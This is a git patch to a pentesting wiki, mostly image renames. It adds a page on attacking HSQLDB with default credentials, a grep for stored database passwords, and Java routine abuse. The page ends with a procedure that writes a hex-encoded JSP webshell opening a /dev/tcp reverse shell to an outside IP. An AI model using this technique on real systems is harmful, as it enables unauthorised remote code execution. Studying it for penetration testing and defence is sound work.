From adba221295ce90df97efe05466d56476ecd646da Mon Sep 17 00:00:00 2001 
From: CPol Date: Wed, 2 Dec 2020 23:18:31 +0000 Subject: [PATCH] GitBook: [master] 20 pages and 40 assets modified --- .gitbook/assets/{1.png => 1 (2) (1).png} | Bin ...2616e67655f696d672e706e67 (6) (4) (1).png} | Bin ...2616e67655f696d672e706e67 (6) (4) (2).png} | Bin ...2616e67655f696d672e706e67 (6) (4) (3).png} | Bin ...2616e67655f696d672e706e67 (6) (4) (4).png} | Bin ...2616e67655f696d672e706e67 (6) (4) (5).png} | Bin ...2616e67655f696d672e706e67 (6) (4) (6).png} | Bin ... (107) (1).png => image (107) (2) (1).png} | Bin ...mage (107).png => image (107) (2) (2).png} | Bin ...mage (121).png => image (121) (1) (1).png} | Bin ...mage (172).png => image (172) (1) (1).png} | Bin ...mage (207).png => image (207) (1) (1).png} | Bin ...mage (215).png => image (215) (1) (1).png} | Bin ...mage (227).png => image (227) (1) (1).png} | Bin ...mage (254).png => image (254) (1) (1).png} | Bin ...mage (314).png => image (314) (1) (1).png} | Bin ... (345) (1).png => image (345) (2) (1).png} | Bin ...mage (345).png => image (345) (2) (2).png} | Bin ...der4 (1).gif => intruder4 (1) (1) (1).gif} | Bin ...{poison (1).jpg => poison (1) (1) (1).jpg} | Bin 1911-pentesting-fox.md | 2 +- README.md | 2 +- SUMMARY.md | 1 + exploiting/reversing.md | 2 +- .../linux-privilege-escalation-checklist.md | 2 +- .../android-app-pentesting/apk-decompilers.md | 2 +- .../drozer-tutorial/README.md | 6 +- .../exploiting-content-providers.md | 4 +- mobile-apps-pentesting/android-checklist.md | 2 +- pentesting-methodology.md | 2 +- ...ava-dns-deserialization-and-gadgetprobe.md | 2 +- .../unicode-normalization-vulnerability.md | 2 +- pentesting/9001-pentesting-hsqldb.md | 80 ++++++++++++++++++ ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 2 +- .../pentesting-network/wifi-attacks/README.md | 2 +- pentesting/pentesting-web/drupal.md | 2 +- pentesting/pentesting-web/wordpress.md | 2 +- .../active-directory-methodology/README.md | 2 +- ...rivileged-accounts-and-token-privileges.md | 2 +- 
.../checklist-windows-privilege-escalation.md | 2 +- 40 files changed, 102 insertions(+), 21 deletions(-) rename .gitbook/assets/{1.png => 1 (2) (1).png} (100%) rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (1).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png} (100%) rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (2).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png} (100%) rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (3).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png} (100%) rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (5).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png} (100%) rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (6).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png} (100%) rename 
.gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png} (100%) rename .gitbook/assets/{image (107) (1).png => image (107) (2) (1).png} (100%) rename .gitbook/assets/{image (107).png => image (107) (2) (2).png} (100%) rename .gitbook/assets/{image (121).png => image (121) (1) (1).png} (100%) rename .gitbook/assets/{image (172).png => image (172) (1) (1).png} (100%) rename .gitbook/assets/{image (207).png => image (207) (1) (1).png} (100%) rename .gitbook/assets/{image (215).png => image (215) (1) (1).png} (100%) rename .gitbook/assets/{image (227).png => image (227) (1) (1).png} (100%) rename .gitbook/assets/{image (254).png => image (254) (1) (1).png} (100%) rename .gitbook/assets/{image (314).png => image (314) (1) (1).png} (100%) rename .gitbook/assets/{image (345) (1).png => image (345) (2) (1).png} (100%) rename .gitbook/assets/{image (345).png => image (345) (2) (2).png} (100%) rename .gitbook/assets/{intruder4 (1).gif => intruder4 (1) (1) (1).gif} (100%) rename .gitbook/assets/{poison (1).jpg => poison (1) (1) (1).jpg} (100%) create mode 100644 pentesting/9001-pentesting-hsqldb.md diff --git a/.gitbook/assets/1.png b/.gitbook/assets/1 (2) (1).png similarity index 100% rename from .gitbook/assets/1.png rename to .gitbook/assets/1 (2) (1).png 
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (1).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (2).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (2).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (3).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (3).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (5).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (5).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (6).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png
diff --git a/.gitbook/assets/image (107) (1).png b/.gitbook/assets/image (107) (2) (1).png
similarity index 100%
rename from .gitbook/assets/image (107) (1).png
rename to .gitbook/assets/image (107) (2) (1).png
diff --git a/.gitbook/assets/image (107).png b/.gitbook/assets/image (107) (2) (2).png
similarity index 100%
rename from .gitbook/assets/image (107).png
rename to .gitbook/assets/image (107) (2) (2).png
diff --git a/.gitbook/assets/image (121).png b/.gitbook/assets/image (121) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (121).png
rename to .gitbook/assets/image (121) (1) (1).png
diff --git a/.gitbook/assets/image (172).png b/.gitbook/assets/image (172) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (172).png
rename to .gitbook/assets/image (172) (1) (1).png
diff --git a/.gitbook/assets/image (207).png b/.gitbook/assets/image (207) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (207).png
rename to .gitbook/assets/image (207) (1) (1).png
diff --git a/.gitbook/assets/image (215).png b/.gitbook/assets/image (215) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (215).png
rename to .gitbook/assets/image (215) (1) (1).png
diff --git a/.gitbook/assets/image (227).png b/.gitbook/assets/image (227) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (227).png
rename to .gitbook/assets/image (227) (1) (1).png
diff --git a/.gitbook/assets/image (254).png b/.gitbook/assets/image (254) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (254).png
rename to .gitbook/assets/image (254) (1) (1).png
diff --git a/.gitbook/assets/image (314).png b/.gitbook/assets/image (314) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (314).png
rename to .gitbook/assets/image (314) (1) (1).png
diff --git a/.gitbook/assets/image (345) (1).png b/.gitbook/assets/image (345) (2) (1).png
similarity index 100%
rename from .gitbook/assets/image (345) (1).png
rename to .gitbook/assets/image (345) (2) (1).png
diff --git a/.gitbook/assets/image (345).png b/.gitbook/assets/image (345) (2) (2).png
similarity index 100%
rename from .gitbook/assets/image (345).png
rename to .gitbook/assets/image (345) (2) (2).png
diff --git a/.gitbook/assets/intruder4 (1).gif b/.gitbook/assets/intruder4 (1) (1) (1).gif similarity index 100% rename from .gitbook/assets/intruder4 (1).gif rename to .gitbook/assets/intruder4 (1) (1) (1).gif diff --git a/.gitbook/assets/poison (1).jpg b/.gitbook/assets/poison (1) (1) (1).jpg similarity index 100% rename from .gitbook/assets/poison (1).jpg rename to .gitbook/assets/poison (1) (1) (1).jpg diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 44046fec8..5864e38da 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -10,7 +10,7 @@ dht udp "DHT Nodes" ![](.gitbook/assets/image%20%28182%29.png) -![](.gitbook/assets/image%20%28345%29%20%282%29.png) +![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29.png) InfluxDB diff --git a/README.md b/README.md index 36a17486c..b6459ddcc 100644 --- a/README.md +++ b/README.md @@ -20,7 +20,7 @@ Don't forget to **give ⭐ on the github** to motivate me to continue developing -![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%286%29.png) +![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/SUMMARY.md b/SUMMARY.md index bdf247094..912eae532 100644 --- a/SUMMARY.md +++ b/SUMMARY.md 
@@ -274,6 +274,7 @@ * [6379 - Pentesting Redis](pentesting/6379-pentesting-redis.md) * [8009 - Pentesting Apache JServ Protocol \(AJP\)](pentesting/8009-pentesting-apache-jserv-protocol-ajp.md) * [8089 - Splunkd](pentesting/8089-splunkd.md) +* [9001 - Pentesting HSQLDB](pentesting/9001-pentesting-hsqldb.md) * [9042/9160 - Pentesting Cassandra](pentesting/cassandra.md) * [9100 - Pentesting Raw Printing \(JetDirect, AppSocket, PDL-datastream\)](pentesting/9100-pjl.md) * [9200 - Pentesting Elasticsearch](pentesting/9200-pentesting-elasticsearch.md) diff --git a/exploiting/reversing.md b/exploiting/reversing.md index 6c62e8cb3..8b9ee65c1 100644 --- a/exploiting/reversing.md +++ b/exploiting/reversing.md @@ -45,7 +45,7 @@ DebuggableAttribute.DebuggingModes.EnableEditAndContinue)] And click on **compile**: -![](../.gitbook/assets/image%20%28314%29.png) +![](../.gitbook/assets/image%20%28314%29%20%281%29.png) Then save the new file on _**File >> Save module...**_: diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md index 72d8eced9..cc83b31ef 100644 --- a/linux-unix/linux-privilege-escalation-checklist.md +++ b/linux-unix/linux-privilege-escalation-checklist.md 
@@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md index 667429a6a..0803b1a50 100644 --- a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md +++ b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md @@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s **Only for Windows.** -![](../../.gitbook/assets/image%20%28207%29.png) +![](../../.gitbook/assets/image%20%28207%29%20%281%29.png) ### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases) diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md index c64e76965..9a434dafa 100644 --- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md 
@@ -112,7 +112,7 @@ Attack Surface: ### Activities -An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file: +An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file: ```markup @@ -187,7 +187,7 @@ Take a look to the **drozer** help for `app.service.send`: ![](../../../.gitbook/assets/image%20%2830%29.png) -Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where. +Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where. Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details. In the following example: @@ -278,7 +278,7 @@ run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --compo ### Is debuggeable A prodduction APK should never be debuggeable. -This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code. +This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code. When an application is debuggable, it will appear in the Manifest: 
diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 9c3fbc4a0..1cfb83f09 100644 --- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/ You should also check the **ContentProvider code** to search for queries: -![](../../../.gitbook/assets/image%20%28121%29%20%281%29.png) +![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29.png) Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method: @@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n ![](../../../.gitbook/assets/image%20%28211%29.png) -![](../../../.gitbook/assets/image%20%28254%29%20%281%29.png) +![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29.png) Because you will be able to call them diff --git a/mobile-apps-pentesting/android-checklist.md b/mobile-apps-pentesting/android-checklist.md index f32fa8181..5de26c7cc 100644 --- a/mobile-apps-pentesting/android-checklist.md +++ b/mobile-apps-pentesting/android-checklist.md 
@@ -60,7 +60,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/pentesting-methodology.md b/pentesting-methodology.md index 9da609e8e..1fbf53de5 100644 --- a/pentesting-methodology.md +++ b/pentesting-methodology.md @@ -132,7 +132,7 @@ Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to * [**CBC-MAC**](crypto/cipher-block-chaining-cbc-mac-priv.md) * [**Padding Oracle**](crypto/padding-oracle-priv.md) -![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%281%29.png) +![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%281%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) diff --git a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md index 5d14871f9..3cec66ef6 100644 --- a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md 
+++ b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md @@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) ****with Java classes for being tested. -![](../../.gitbook/assets/intruder4%20%281%29%20%281%29.gif) +![](../../.gitbook/assets/intruder4%20%281%29%20%281%29%20%281%29.gif) ### More Information diff --git a/pentesting-web/unicode-normalization-vulnerability.md b/pentesting-web/unicode-normalization-vulnerability.md index ead3b02c4..26f0e4a01 100644 --- a/pentesting-web/unicode-normalization-vulnerability.md +++ b/pentesting-web/unicode-normalization-vulnerability.md @@ -76,7 +76,7 @@ You could use one of the following characters to trick the webapp and exploit a Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e` -![](../.gitbook/assets/image%20%28215%29.png) +![](../.gitbook/assets/image%20%28215%29%20%281%29.png) ## References diff --git a/pentesting/9001-pentesting-hsqldb.md b/pentesting/9001-pentesting-hsqldb.md new file mode 100644 index 000000000..58369b26e --- /dev/null +++ b/pentesting/9001-pentesting-hsqldb.md 
@@ -0,0 +1,80 @@ +# 9001 - Pentesting HSQLDB + +## Basic Information + +HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\) is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. + +**Default port:** 9001 + +```text +9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0) +``` + +## Information + +#### Default Settings + +Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges. + +Default credentials are usually `sa` with a blank password. + +If you’ve exploited another service, search for possible credentials using + +```text +grep -rP 'jdbc:hsqldb.*password.*' /path/to/search +``` + +Note the database name carefully - you’ll need it to connect. + +## Info Gathering + +Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials. + +Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`. + +## Tricks + +### Java Language Routines + +We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath. + +JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement. + +If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement. 
+ +### Reading Java System Properties + +Create function: + +```text +CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA +DETERMINISTIC NO SQL +EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty' +``` + +Execute function: + +```text +VALUES(getsystemproperty('user.name')) +``` + +You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html). + +### Write Content to File + +You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Note the maximum size of 1024 bytes**. + +Create procedure: + +```text +CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) +LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME +'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename' +``` + +Execute procedure: + +```text +call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024))) +``` + diff --git a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index a77e2e352..1fb62e7fd 100644 --- a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md 
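Review bot: The new `pentesting/9001-pentesting-hsqldb.md` page shows that `CREATE FUNCTION`/`CREATE PROCEDURE ... EXTERNAL NAME 'CLASSPATH:...'` reaches static methods of any class on the server's classpath, but it carries no hardening or detection guidance, which a per-port page should give next to the technique. I would add a short "Hardening / Detection" section after "Tricks" saying that the `sa` account must not keep the blank default password the page describes, that the server should stay bound to localhost or be firewalled (the "Default Settings" paragraph already notes it is usually not exposed), and that HSQLDB documents a `hsqldb.method_class_names` property for restricting which Java classes SQL/JRT routines may call — verify the exact form for the deployed version. On the detection side, `CREATE FUNCTION`/`CREATE PROCEDURE` statements whose `CLASSPATH:` target lies outside the application's own packages are a high-signal event worth logging and alerting on. The hunk is the whole new file, so no enclosing context is cut.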
@@ -45,7 +45,7 @@ responder -I --wpad Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" \(most probably a **NTLMv2 Challenge/Response**\): -![](../../.gitbook/assets/poison%20%281%29.jpg) +![](../../.gitbook/assets/poison%20%281%29%20%281%29.jpg) ## **Inveigh** diff --git a/pentesting/pentesting-network/wifi-attacks/README.md b/pentesting/pentesting-network/wifi-attacks/README.md index a13b593da..ba8fcfb27 100644 --- a/pentesting/pentesting-network/wifi-attacks/README.md +++ b/pentesting/pentesting-network/wifi-attacks/README.md @@ -329,7 +329,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening: -![](../../../.gitbook/assets/image%20%28172%29.png) +![](../../../.gitbook/assets/image%20%28172%29%20%281%29.png) Once the handshake is captured you can **crack** it with `aircrack-ng`: diff --git a/pentesting/pentesting-web/drupal.md b/pentesting/pentesting-web/drupal.md index 8297c3235..93eb6726f 100644 --- a/pentesting/pentesting-web/drupal.md +++ b/pentesting/pentesting-web/drupal.md @@ -24,7 +24,7 @@ Accessing _/user/<number>_ you can see the number of existing users, in th ![](../../.gitbook/assets/image%20%2826%29.png) -![](../../.gitbook/assets/image%20%28227%29.png) +![](../../.gitbook/assets/image%20%28227%29%20%281%29.png) ## Hidden pages enumeration diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index 5c7b47b34..919054def 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md 
@@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](../../.gitbook/assets/image%20%28107%29.png) +![](../../.gitbook/assets/image%20%28107%29%20%282%29.png) ![](../../.gitbook/assets/image%20%28224%29.png) diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md index 316d5d324..9282b9e47 100644 --- a/windows/active-directory-methodology/README.md +++ b/windows/active-directory-methodology/README.md @@ -396,7 +396,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s -![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%282%29.png) +![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%282%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md index 56b6b65b8..de64c241d 100644 --- a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md +++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md @@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha Note the spotless' user membership: -![](../../.gitbook/assets/1%20%282%29.png) +![](../../.gitbook/assets/1%20%282%29%20%281%29.png) However, we can still add new users: diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md index 3deea92c3..11bed2a6a 100644 --- a/windows/checklist-windows-privilege-escalation.md +++ b/windows/checklist-windows-privilege-escalation.md 
